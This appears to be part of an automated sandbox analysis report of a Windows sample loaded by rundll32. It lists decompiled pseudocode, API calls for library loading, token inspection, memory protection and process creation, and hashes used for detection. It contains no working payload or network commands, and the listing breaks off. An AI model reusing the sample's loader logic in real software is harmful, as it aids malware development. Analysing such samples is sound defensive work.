CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 0494CAD6

Strings

D, xrefs: 0494CABA

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: CreateProcessmemset
String ID: D
API String ID: 2296119082-2746444292
Opcode ID: 65c812ec78ebc784e25d127ed0c9cd9dc01f4954b4c5bb219a9475f045574894
Instruction ID: 1f6b54dda3912c10ddc4f9466abcb599a2eaaaa8f28e75cb53fd69da38a5bdda
Opcode Fuzzy Hash: 65c812ec78ebc784e25d127ed0c9cd9dc01f4954b4c5bb219a9475f045574894
Instruction Fuzzy Hash: 9CF065F26442087EF720E665CC0AFBF3AACDBC1714F504125BB05EB1C0E5A4AD0582B5

Uniqueness

Uniqueness Score: -1.00%

Function 04941494 Relevance: 3.1, APIs: 2, Instructions: 108
sleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E04941494(void* __edi, void* __fp0) {
				char _v8;
				void* __ecx;
				char _t19;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t27;
				signed int _t29;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr _t40;
				void* _t50;
				intOrPtr _t52;
				void* _t56;
				void* _t58;
				signed int _t60;
				char _t62;

				_t68 = __fp0;
				E049415D4();
				_t19 = E0494911F(0x20);
				_v8 = _t19;
				_t54 = 0x1f;
				do {
					_t2 = _t54 + 0x63; // 0x82
					 *((char*)(_t54 + _t19)) = _t2;
					_t54 = _t54 - 1;
				} while (_t54 >= 0);
				E0494913B( &_v8, 0);
				_t22 = E0494BB4D(_t54, __fp0); // executed
				 *0x4960fd8 = _t22;
				if(_t22 != 0) {
					E04954257( *((intOrPtr*)(_t22 + 0x224)));
					_t24 =  *0x4960fd8; // 0x49ffc50
					_t60 = 1;
					_t50 = _t58;
					__eflags =  *((intOrPtr*)(_t24 + 0x101c)) - 1;
					if( *((intOrPtr*)(_t24 + 0x101c)) == 1) {
						__imp__CoInitializeEx(0, 6, __edi);
						_t30 =  *0x4960fd8; // 0x49ffc50
						_push(0);
						_push(0x495d9b8);
						_t31 = _t30 + 0x228;
						__eflags = _t31;
						_push(_t31);
						_t56 = E04949924(0x495d9b8);
						_t62 = E049416EC(0x495d9b8, 0x2a);
						_v8 = _t62;
						while(1) {
							_t52 =  *0x4960fd8; // 0x49ffc50
							_t34 =  *0x4960fc0; // 0x49ffa38
							_t36 =  *0x4960fb4; // 0x49ffc18
							_t37 =  *_t36( *((intOrPtr*)(_t34 + 0x54))(_t62, _t52 + 0x1644, _t56, 0, 0));
							__eflags = _t37 - 5;
							if(_t37 != 5) {
								break;
							}
							Sleep(0x7d0);
						}
						E04949D66( &_v8);
						_t40 =  *0x4960fa0; // 0x49ff8a0
						_pop(_t50);
						 *((intOrPtr*)(_t40 + 0xec))(0);
						_t24 =  *0x4960fd8; // 0x49ffc50
						_t60 = 1;
						__eflags = 1;
					}
					__eflags =  *(_t24 + 0x1898) & 0x00010082;
					if(( *(_t24 + 0x1898) & 0x00010082) != 0) {
						L13:
						 *((intOrPtr*)(_t24 + 0xa4)) = _t60;
						_t25 =  *0x4960fd8; // 0x49ffc50
						__eflags =  *((intOrPtr*)(_t25 + 0x214)) - 3;
						if(__eflags != 0) {
							goto L15;
						} else {
							goto L14;
						}
					} else {
						_t14 = _t24 + 0x224; // 0x4940000
						_t54 =  *_t14;
						_t29 = E0494A664( *_t14); // executed
						__eflags = _t29;
						_t24 =  *0x4960fd8; // 0x49ffc50
						_t50 = _t50;
						if(_t29 == 0) {
							goto L13;
						} else {
							__eflags =  *((intOrPtr*)(_t24 + 0x214)) - 3;
							if( *((intOrPtr*)(_t24 + 0x214)) == 3) {
								L14:
								__eflags = E049429DD();
								if(__eflags < 0) {
									L15:
									E049412F8(_t50, _t54, __eflags, _t68);
								}
							}
						}
					}
					_t27 = 0;
					__eflags = 0;
				} else {
					_t27 = _t22 + 1;
				}
				return _t27;
			}

0x04941494
0x04941498
0x0494149f
0x049414a7
0x049414aa
0x049414ab
0x049414ab
0x049414ae
0x049414b1
0x049414b1
0x049414be
0x049414c4
0x049414c9
0x049414d1
0x049414e0
0x049414e5
0x049414ec
0x049414ed
0x049414ee
0x049414f4
0x049414fe
0x04941504
0x0494150e
0x0494150f
0x04941510
0x04941510
0x04941515
0x0494151e
0x04941525
0x0494152a
0x0494152d
0x0494152d
0x04941533
0x04941547
0x0494154c
0x0494154e
0x04941551
0x00000000
0x00000000
0x04941558
0x04941558
0x04941564
0x04941569
0x0494156e
0x04941570
0x04941576
0x0494157d
0x0494157d
0x0494157e
0x0494157f
0x04941589
0x049415ac
0x049415ac
0x049415b2
0x049415b7
0x049415be
0x00000000
0x00000000
0x00000000
0x00000000
0x0494158b
0x0494158b
0x0494158b
0x04941592
0x04941597
0x04941599
0x0494159e
0x0494159f
0x00000000
0x049415a1
0x049415a1
0x049415a8
0x049415c0
0x049415c5
0x049415c7
0x049415c9
0x049415c9
0x049415c9
0x049415c7
0x049415a8
0x0494159f
0x049415ce
0x049415ce
0x049414d3
0x049414d3
0x049414d3
0x049415d3

APIs

CoInitializeEx.OLE32(00000000,00000006,?,?,?,?,?,04941005), ref: 049414FE
Sleep.KERNEL32(000007D0), ref: 04941558

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: InitializeSleep
String ID:
API String ID: 4203272843-0
Opcode ID: fb5830d752b724463debea00de6989d43687b48a76231b6d355a994343edf9c7
Instruction ID: f74ff9105cac5f2aa3a0890b712cc3fa694b34065e16d20aeffad915978a41ed
Opcode Fuzzy Hash: fb5830d752b724463debea00de6989d43687b48a76231b6d355a994343edf9c7
Instruction Fuzzy Hash: D731A2B1644200EFE710EFB4D98EEA67BECEBC5354F154479E50297180EA78FD818B60

Uniqueness

Uniqueness Score: -1.00%

Function 04949491 Relevance: 3.0, APIs: 2, Instructions: 38
libraryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E04949491(void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ecx;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t23;
				void* _t26;

				_push(_t15);
				_t23 = __edx;
				_t13 = _t15;
				_t5 = E049490CA(_t15, _a4);
				_t26 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x26e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t11 = E04949446(_t13, _t23, _t7); // executed
					_t26 = _t11;
				}
				E04949D4C( &_v8);
				return _t26;
			}

0x04949494
0x0494949b
0x0494949d
0x0494949f
0x049494a5
0x049494a7
0x049494b1
0x049494b2
0x049494c1
0x049494b4
0x049494b4
0x049494b4
0x049494c5
0x049494cc
0x049494d2
0x049494d2
0x049494d8
0x049494e4

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,?,0495D870,?,049415E8,0000026E,0494149D,?,?,04941005), ref: 049494B4
LoadLibraryA.KERNELBASE(00000000,?,?,?,0495D870,?,049415E8,0000026E,0494149D,?,?,04941005), ref: 049494C1

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 19d03a970dd3028eaec723776eb36133ce76ebf61a8de3b725b43f84d8068dbc
Instruction ID: 271ec5ca81a6e9b5b9a55bce1172b701ea58e6289ce242c069b6366404dc2572
Opcode Fuzzy Hash: 19d03a970dd3028eaec723776eb36133ce76ebf61a8de3b725b43f84d8068dbc
Instruction Fuzzy Hash: 35F082B2604224AF9B24ABB9E848D5BBBADEBC42A4720453AF405D7250E974ED4086A0

Uniqueness

Uniqueness Score: -1.00%

Function 04941000 Relevance: 3.0, APIs: 2, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04941000() {
				void* _t4;
				void* _t5;

				E04941494(_t4, _t5);
				ExitProcess(0);
			}

0x04941000
0x0494100c

APIs

ExitProcess.KERNEL32(00000000), ref: 0494100C

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 90cfdfae97d7d9870d47f097b73d117653318e72c745724d4daca2451be06c87
Instruction ID: 3bdf6346d19c19ff06352faa393784539cb8b18b6627f3b19a8c35f46d870168
Opcode Fuzzy Hash: 90cfdfae97d7d9870d47f097b73d117653318e72c745724d4daca2451be06c87
Instruction Fuzzy Hash: 97B01230254040CFEB00DB70D44DF6C37D0BB88302F4988B8F105CE045EA605400C710

Uniqueness

Uniqueness Score: -1.00%

Function 046B0499 Relevance: 2.6, APIs: 2, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?), ref: 046B051C

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 647806292e40d76c1808ca0a8b573877cb0d1ed87da1151593330ae6246e7e91
Instruction ID: 73e18194b656cda412f4254860008268f047b32b5983bc99094ad9c023b8f01b
Opcode Fuzzy Hash: 647806292e40d76c1808ca0a8b573877cb0d1ed87da1151593330ae6246e7e91
Instruction Fuzzy Hash: 7D1173A2E4431CEFDB10CA90DDC47EE6AB5EB25345F588065D4865B382F6316DC1A781

Uniqueness

Uniqueness Score: -1.00%

Function 046B11A5 Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0092f584a839dd62b4c13f44ce63d536f0c9e1244b20ab5f9c8e56308dbb263e
Instruction ID: bb12c3510d1c5dfcd5571f1b81d161fb12a1ea3d261079b1a7bba27eb40e65b0
Opcode Fuzzy Hash: 0092f584a839dd62b4c13f44ce63d536f0c9e1244b20ab5f9c8e56308dbb263e
Instruction Fuzzy Hash: D131B2B5E44209FBDF10ABA0C8B47EE7674AB16380F840061D982A7352F2357AC1A7D5

Uniqueness

Uniqueness Score: -1.00%

Function 0494DC83 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0494DC83(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0494DB58(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0494DBAF(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E0494913B( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x4960fc8; // 0x49ffb00
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x4960fc8; // 0x49ffb00
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x4960fc8; // 0x49ffb00
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x0494dc8a
0x0494dc8c
0x0494dc93
0x0494dc95
0x0494dc98
0x0494dc9d
0x0494dca2
0x0494dcac
0x0494dcaf
0x0494dcb2
0x0494dcb7
0x0494dcb9
0x0494dcbf
0x0494dd1f
0x0494dd27
0x0494dd2d
0x0494dd34
0x0494dd3a
0x00000000
0x0494dd3b
0x0494dcc4
0x0494dcc5
0x0494dcc6
0x0494dcc7
0x0494dcc8
0x0494dcc9
0x0494dcca
0x0494dccb
0x0494dcd0
0x0494dcd2
0x0494dcd7
0x0494dcd8
0x0494dce2
0x00000000
0x00000000
0x0494dce6
0x0494dd12
0x0494dd12
0x0494dd1a
0x0494dd1d
0x00000000
0x0494dd1d
0x0494dce8
0x0494dce8
0x0494dceb
0x0494dcee
0x0494dcee
0x0494dcf1
0x0494dcf3
0x0494dcfd
0x00000000
0x00000000
0x0494dd02
0x0494dd03
0x0494dd06
0x0494dd0b
0x00000000
0x00000000
0x00000000
0x0494dd0d
0x0494dd11
0x00000000
0x0494dd11
0x0494dd40

APIs

Part of subcall function 0494DB58: GetCurrentThread.KERNEL32 ref: 0494DB6B
Part of subcall function 0494DB58: OpenThreadToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB72
Part of subcall function 0494DB58: GetLastError.KERNEL32(?,?,0494DC9D,00000000,04940000), ref: 0494DB79
Part of subcall function 0494DB58: OpenProcessToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB9E

Part of subcall function 0494DBAF: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04940000,00000000,00000000,?,0494DC30,00000000,00000000,?,0494DC59), ref: 0494DBCA
Part of subcall function 0494DBAF: GetLastError.KERNEL32(?,0494DC30,00000000,00000000,?,0494DC59,00001644,?,0494BBDE), ref: 0494DBD1

FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04940000), ref: 0494DD27

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
String ID:
API String ID: 1806447117-0
Opcode ID: cfdb73bafe4bd61e906b958b38e36c1e60615e87fade55da9f5e3e6bb916cf97
Instruction ID: 63cbdd8797490739f6697983892d5caf3a27a2594b14f2ebdafa4e35d4660f34
Opcode Fuzzy Hash: cfdb73bafe4bd61e906b958b38e36c1e60615e87fade55da9f5e3e6bb916cf97
Instruction Fuzzy Hash: 6D215E76A00209EFDB10DFA9D885EAEBBB8FF88700F50457AE505E7250E770AA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 046B07A4 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 046B07D5

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 67133743171ce9d8cdc9a07f765dc30c570cf60d44af1830f195452f5f9a1b35
Instruction ID: f9ad0adb733e0abe8c9d1d5826df55a50c240f618ec50b39c590ecf13cac26fb
Opcode Fuzzy Hash: 67133743171ce9d8cdc9a07f765dc30c570cf60d44af1830f195452f5f9a1b35
Instruction Fuzzy Hash: 94011974B09249DFDB54CF94C884AEEBBB4BF04260F009885E492AB252F730B9C1DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0494DC33 Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0494DC33(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x4960fc8; // 0x49ffb00
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0494DC1C(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x4960fa0; // 0x49ff8a0
							 *((intOrPtr*)(_t18 + 0x34))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}

0x0494dc37
0x0494dc3f
0x0494dc47
0x0494dc4c
0x0494dc54
0x0494dc59
0x0494dc5d
0x0494dc7b
0x0494dc7e
0x0494dc5f
0x0494dc62
0x0494dc64
0x0494dc6c
0x0494dc6c
0x0494dc6f
0x0494dc6f
0x0494dc82
0x0494dc4f
0x0494dc4f
0x0494dc4f

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f749291b51cb95b78818a88a21caff338848272a8a3c892ec4ca7fe15cead463
Instruction ID: 1d61875ef936c8756b271c30f838e4bf964b796880afba742ea30f95fb809d52
Opcode Fuzzy Hash: f749291b51cb95b78818a88a21caff338848272a8a3c892ec4ca7fe15cead463
Instruction Fuzzy Hash: F7F01236A41114EFCB10DBA4D945E9E7BA8FB88346F4442B9E501E7150DBB4EE00EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 046B0E3E Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 046B0E36

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dcb77b7dde468c4429c3eacf2e802b1e328b244cbed8a4ff464840034cf41f56
Instruction ID: 473ed921ddb785224b05d747a76e23e2a1c60f26ebcbbdd311b3731b522f7a38
Opcode Fuzzy Hash: dcb77b7dde468c4429c3eacf2e802b1e328b244cbed8a4ff464840034cf41f56
Instruction Fuzzy Hash: 71F07474A14204CFCB18CB84C594AEEBF71AF08320F595048D4466B351F735A9C2DF90

Uniqueness

Uniqueness Score: -1.00%

Function 046B1C80 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 046B1C80

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fdae159f5b63167561a356be9577cc6a5469f915a5d238255440c61cf8b3ecaf
Instruction ID: a784d704d4a0d6b594a7bd1e22657e5f4b41338229b6c64670bc60c59d959c37
Opcode Fuzzy Hash: fdae159f5b63167561a356be9577cc6a5469f915a5d238255440c61cf8b3ecaf
Instruction Fuzzy Hash: D3E01AB1A0520DEACF00CF90D0652FDB7F4AB062D9F204017D482A6100F3346AC2EBC0

Uniqueness

Uniqueness Score: -1.00%

Function 046B044F Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?), ref: 046B0BBB

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2efa1e35d57d1254694c6657700579f5ecd92471f7d6fffa99b604cb6f312ba0
Instruction ID: 2e459fbd748d993c7852375d658011caf1c80057c463327483edc3b47c88d0e7
Opcode Fuzzy Hash: 2efa1e35d57d1254694c6657700579f5ecd92471f7d6fffa99b604cb6f312ba0
Instruction Fuzzy Hash: E8E0B6B5A00108EFDB18CB80CD84EFEBB75FB14300F544480E48163250E332AE40AB60

Uniqueness

Uniqueness Score: -1.00%

Function 0494911F Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0494911F(long _a4) {
				void* _t2;
				void* _t3;

				_t2 =  *0x49610a4;
				if(_t2 != 0) {
					_t3 = RtlAllocateHeap(_t2, 8, _a4); // executed
					return _t3;
				} else {
					return _t2;
				}
			}

0x04949122
0x04949129
0x04949133
0x0494913a
0x0494912c
0x0494912c
0x0494912c

APIs

RtlAllocateHeap.NTDLL(?,00000008,?,?,04949C58,?,00000144,?,0495D870), ref: 04949133

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46bdd93756cdb5db50668a00ceeb11219e4f130492b4148bfdb9f7461e054252
Instruction ID: 84edac5a04011dd724199e057b9d4d24f587d0129f615cf28fe04a2023c99440
Opcode Fuzzy Hash: 46bdd93756cdb5db50668a00ceeb11219e4f130492b4148bfdb9f7461e054252
Instruction Fuzzy Hash: E7C08C75284308EBDF101EB8F809E923B9CEB48A59F008025F60CCA041DB3AFC104B90

Uniqueness

Uniqueness Score: -1.00%

Function 0494910A Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0494910A() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x49610a4 = _t1;
				return _t1;
			}

0x04949113
0x04949119
0x0494911e

APIs

HeapCreate.KERNELBASE(00000000,00096000,00000000,04941030), ref: 04949113

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9d202144473c4fcc4f75ae4bea6b50c447a00e88993732b7fac903260dd8f67a
Instruction ID: bbaaf30fbd028503f8ac6d883f918a799e756e9f007bd17d0dff47e50e52035c
Opcode Fuzzy Hash: 9d202144473c4fcc4f75ae4bea6b50c447a00e88993732b7fac903260dd8f67a
Instruction Fuzzy Hash: 7CB01274689300EADE500B306D07B013D50D740B02F240225F3019C1C0CAB918009608

Uniqueness

Uniqueness Score: -1.00%

Function 046B0BB1 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?), ref: 046B0BBB

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 11959dc47cbe69a1d1983ee25c8494f456e1724cc526d44f32103389f00dccd7
Instruction ID: 86885337a000476ce0a7c7095005435f863793bf347a088e7ce63456f1f7269d
Opcode Fuzzy Hash: 11959dc47cbe69a1d1983ee25c8494f456e1724cc526d44f32103389f00dccd7
Instruction Fuzzy Hash: 42B01221204740C3EF5516505588BFAAF70EB0221CF44C8C4C1CB5044BBB34A98AB7F1

Uniqueness

Uniqueness Score: -1.00%

Function 0494B48B Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0494B48B(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0494C30F(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}

0x0494b48e
0x0494b48f
0x0494b492
0x0494b495
0x0494b49a
0x0494b49d
0x0494b4a0
0x0494b4a0
0x0494b4a8
0x0494b4ad
0x0494b4b0
0x0494b4b3
0x0494b4b6
0x0494b4b9
0x0494b4cc
0x0494b4cd
0x0494b4d0
0x0494b4d6
0x0494b4d9
0x0494b4dc
0x00000000
0x00000000
0x0494b4de
